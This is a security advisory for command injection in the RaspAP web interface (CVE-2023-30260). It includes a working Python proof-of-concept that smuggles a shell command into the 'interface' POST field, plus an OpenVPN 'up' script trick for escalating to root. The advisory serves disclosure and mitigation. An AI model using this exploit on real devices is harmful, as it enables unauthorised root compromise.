CVE-2023-30260 Security advisory
Multiple command injection vulnerabilities are present in the RaspAP web interface. They allow an authenticated user to execute arbitrary OS commands with the privileges of the web server. Additional factors in the default configuration allow elevation to root
privileges.
Affected products
RaspAP v2.8.9 and older
Steps to reproduce
- Obtain credentials for RaspAP
- Configure and execute the following script
#!/usr/bin/env python3
import re
import requests
TARGET="10.3.141.1"
CREDS="admin:secret"
URL=f"http://{CREDS}@{TARGET}/hostapd_conf"
sess = requests.Session()
# Get a valid CSRF token
doc = sess.get(URL).text.replace("\n", "")
csrf = re.match('.*name="csrf_token" value="([^"]+)".*', doc).group(1)
print(csrf)
res = sess.post(URL,
data={
"csrf_token": csrf,
"txpower": "auto",
# Command payload is here:
"interface": ";uptime > /tmp/hax; echo",
}
)
if res.status_code != 200:
print("Failed to execute command")
- Observe that the file
/tmp/hax
has been created on the raspi, and contains the output ofuptime
.
Cause
There are two almost identical instances of the vulnerability, at hostapd.php:103 and hostapd.php:108. In both instances, an unsanitized POST variable is fed into a command executed using exec()
.
A third instance exists at configure_client.php:20, exploitable in a similar manner.
Impact
An authenticated user is able to execute arbitrary commands as www-data
.
In the default RaspAP configuration, this can be leveraged to gain root access by exploiting two of the configured sudo
permissions; overwrite the openvpn client configuration to set the following:
script-security 2
up /tmp/payload.sh
and establish an OpenVPN connection. /tmp/payload.sh
will be executed with root privileges.
Proposed Mitigation
Apply sanitization to the txpower
and interface
parameters, and use the PHP built-in escapeshellarg()
before passing them to exec()
.
History
- 2023-06-26: CVE-2023-30260 assigned
- 2023-03-30: Additional fix submitted
- 2023-03-30: Report merged for all three vulnerabilities
- 2023-03-29: Additional vulnerability reported (
configure_client.php
) - 2023-03-29: Initial report removed
- 2023-03-29: Fix applied and released as v2.8.9
- 2023-03-28: Initial report filed (
hostapd.php
)